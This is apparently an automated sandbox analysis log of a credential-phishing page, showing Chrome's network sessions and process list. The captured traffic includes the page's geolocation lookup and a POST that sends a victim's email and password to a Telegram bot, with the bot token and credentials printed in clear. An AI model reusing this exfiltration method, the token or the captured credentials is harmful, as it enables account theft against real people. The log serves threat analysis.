                                                                                                    2025-03-10 12:51:21 UTC317INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 36 37 2e 38 32 2e 31 31 36 2e 31 31 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 6f 6f 6c 2d 34 33 35 32 37 34 37 37 2e 64 79 6e 2e 6f 70 74 6f 6e 6c 69 6e 65 2e 6e 65 74 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 45 6c 69 7a 61 62 65 74 68 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 4a 65 72 73 65 79 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 36 36 34 30 2c 2d 37 34 2e 32 31 30 37 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 36 31 32 38 20 43 61 62 6c 65 76 69 73 69 6f 6e 20 53 79 73 74 65 6d 73 20 43 6f 72 70 2e 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 30 37 32 30 37 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d
                                                                                                    Data Ascii: { "ip": "67.82.116.119", "hostname": "ool-43527477.dyn.optonline.net", "city": "Elizabeth", "region": "New Jersey", "country": "US", "loc": "40.6640,-74.2107", "org": "AS6128 Cablevision Systems Corp.", "postal": "07207", "timezone": "Am


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    16192.168.2.245400834.117.59.814436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:51:23 UTC343OUTGET /json HTTP/1.1
                                                                                                    Host: ipinfo.io
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:51:23 UTC345INHTTP/1.1 200 OK
                                                                                                    access-control-allow-origin: *
                                                                                                    Content-Length: 317
                                                                                                    content-type: application/json; charset=utf-8
                                                                                                    date: Mon, 10 Mar 2025 12:51:23 GMT
                                                                                                    x-content-type-options: nosniff
                                                                                                    via: 1.1 google
                                                                                                    strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close
                                                                                                    2025-03-10 12:51:23 UTC317INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 36 37 2e 38 32 2e 31 31 36 2e 31 31 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 6f 6f 6c 2d 34 33 35 32 37 34 37 37 2e 64 79 6e 2e 6f 70 74 6f 6e 6c 69 6e 65 2e 6e 65 74 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 45 6c 69 7a 61 62 65 74 68 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 4a 65 72 73 65 79 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 36 36 34 30 2c 2d 37 34 2e 32 31 30 37 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 36 31 32 38 20 43 61 62 6c 65 76 69 73 69 6f 6e 20 53 79 73 74 65 6d 73 20 43 6f 72 70 2e 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 30 37 32 30 37 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d
                                                                                                    Data Ascii: { "ip": "67.82.116.119", "hostname": "ool-43527477.dyn.optonline.net", "city": "Elizabeth", "region": "New Jersey", "country": "US", "loc": "40.6640,-74.2107", "org": "AS6128 Cablevision Systems Corp.", "postal": "07207", "timezone": "Am


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    17192.168.2.2454009149.154.167.2204436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:51:23 UTC745OUTPOST /bot7288767743:AAGRVsMLRSfD1NGxN7FxB_HXGEFvLGfPn9w/sendMessage HTTP/1.1
                                                                                                    Host: api.telegram.org
                                                                                                    Connection: keep-alive
                                                                                                    Content-Length: 730
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    Accept: application/json, text/javascript, */*; q=0.01
                                                                                                    sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    Origin: https://kwikkopyegypt.com
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://kwikkopyegypt.com/
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:51:23 UTC730OUTData Raw: 63 68 61 74 5f 69 64 3d 37 31 37 37 39 38 35 30 38 34 26 74 65 78 74 3d 2d 2d 2d 2d 2d 2d 2d 2d 25 32 42 2b 47 65 6e 65 72 61 6c 2b 57 65 62 6d 61 69 6c 2b 52 65 5a 75 6c 54 2b 45 6c 69 7a 61 62 65 74 68 2b 4e 65 77 2b 4a 65 72 73 65 79 25 32 43 2b 55 53 2b 25 32 42 2d 2d 2d 2d 2d 2d 2d 2d 6e 45 6d 61 69 6c 2b 25 33 41 2b 6c 75 6b 65 2e 74 61 74 61 6d 25 34 30 73 6f 75 74 68 77 61 72 6b 2e 61 6e 67 6c 69 63 61 6e 2e 6f 72 67 25 30 41 50 61 73 73 77 6f 72 64 2b 25 33 41 2b 25 33 46 41 63 6e 5f 33 29 25 35 45 4a 25 33 42 43 65 53 58 33 25 30 41 43 68 65 63 6b 65 72 25 33 41 2b 6c 75 6b 65 2e 74 61 74 61 6d 25 34 30 73 6f 75 74 68 77 61 72 6b 2e 61 6e 67 6c 69 63 61 6e 2e 6f 72 67 25 33 41 25 33 46 41 63 6e 5f 33 29 25 35 45 4a 25 33 42 43 65 53 58 33 25 30
                                                                                                    Data Ascii: chat_id=7177985084&text=--------%2B+General+Webmail+ReZulT+Elizabeth+New+Jersey%2C+US+%2B--------nEmail+%3A+luke.tatam%40southwark.anglican.org%0APassword+%3A+%3FAcn_3)%5EJ%3BCeSX3%0AChecker%3A+luke.tatam%40southwark.anglican.org%3A%3FAcn_3)%5EJ%3BCeSX3%0
                                                                                                    2025-03-10 12:51:23 UTC389INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Mon, 10 Mar 2025 12:51:23 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 1107
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                    2025-03-10 12:51:23 UTC1107INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 38 38 37 36 37 37 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6d 61 74 74 68 61 69 67 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 61 74 74 68 61 69 67 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 31 37 37 39 38 35 30 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 69 64 6e 65 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 34 31 36 31 31 30 38 33 2c 22 74 65 78 74 22 3a 22 2d 2d 2d 2d 2d 2d 2d 2d 2b 20 47 65 6e 65 72 61 6c 20 57 65 62 6d 61 69 6c 20 52 65 5a 75 6c 54 20 45 6c 69 7a
                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":30,"from":{"id":7288767743,"is_bot":true,"first_name":"matthaigbot","username":"matthaigbot"},"chat":{"id":7177985084,"first_name":"Sidney","type":"private"},"date":1741611083,"text":"--------+ General Webmail ReZulT Eliz


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    18192.168.2.2454011149.154.167.2204436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:51:25 UTC407OUTGET /bot7288767743:AAGRVsMLRSfD1NGxN7FxB_HXGEFvLGfPn9w/sendMessage HTTP/1.1
                                                                                                    Host: api.telegram.org
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:51:26 UTC346INHTTP/1.1 400 Bad Request
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Mon, 10 Mar 2025 12:51:26 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 80
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                    2025-03-10 12:51:26 UTC80INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d
                                                                                                    Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    19192.168.2.2454013141.193.213.214436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:51:31 UTC662OUTGET / HTTP/1.1
                                                                                                    Host: www.southwark.anglican.org
                                                                                                    Connection: keep-alive
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-Dest: document
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:51:31 UTC178INHTTP/1.1 403 Forbidden
                                                                                                    Server: cloudflare
                                                                                                    Date: Mon, 10 Mar 2025 12:51:31 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 553
                                                                                                    Connection: close
                                                                                                    CF-RAY: 91e2f1aa9ad14374-EWR
                                                                                                    2025-03-10 12:51:31 UTC553INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>cloudflare</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    20192.168.2.2454016141.193.213.214436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:51:34 UTC615OUTGET /favicon.ico HTTP/1.1
                                                                                                    Host: www.southwark.anglican.org
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: image
                                                                                                    Referer: https://www.southwark.anglican.org/
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:51:34 UTC178INHTTP/1.1 403 Forbidden
                                                                                                    Server: cloudflare
                                                                                                    Date: Mon, 10 Mar 2025 12:51:34 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 553
                                                                                                    Connection: close
                                                                                                    CF-RAY: 91e2f1bbc812069b-EWR
                                                                                                    2025-03-10 12:51:34 UTC553INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>cloudflare</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:08:50:26
                                                                                                    Start date:10/03/2025
                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                    Imagebase:0x7ff6b0b40000
                                                                                                    File size:3'001'952 bytes
                                                                                                    MD5 hash:290DF23002E9B52249B5549F0C668A86
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:1
                                                                                                    Start time:08:50:26
                                                                                                    Start date:10/03/2025
                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1832,i,3419163324876400064,12375279564585686191,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=2060 /prefetch:11
                                                                                                    Imagebase:0x7ff6b0b40000
                                                                                                    File size:3'001'952 bytes
                                                                                                    MD5 hash:290DF23002E9B52249B5549F0C668A86
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:2
                                                                                                    Start time:08:50:34
                                                                                                    Start date:10/03/2025
                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.org"
                                                                                                    Imagebase:0x7ff6b0b40000
                                                                                                    File size:3'001'952 bytes
                                                                                                    MD5 hash:290DF23002E9B52249B5549F0C668A86
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    No disassembly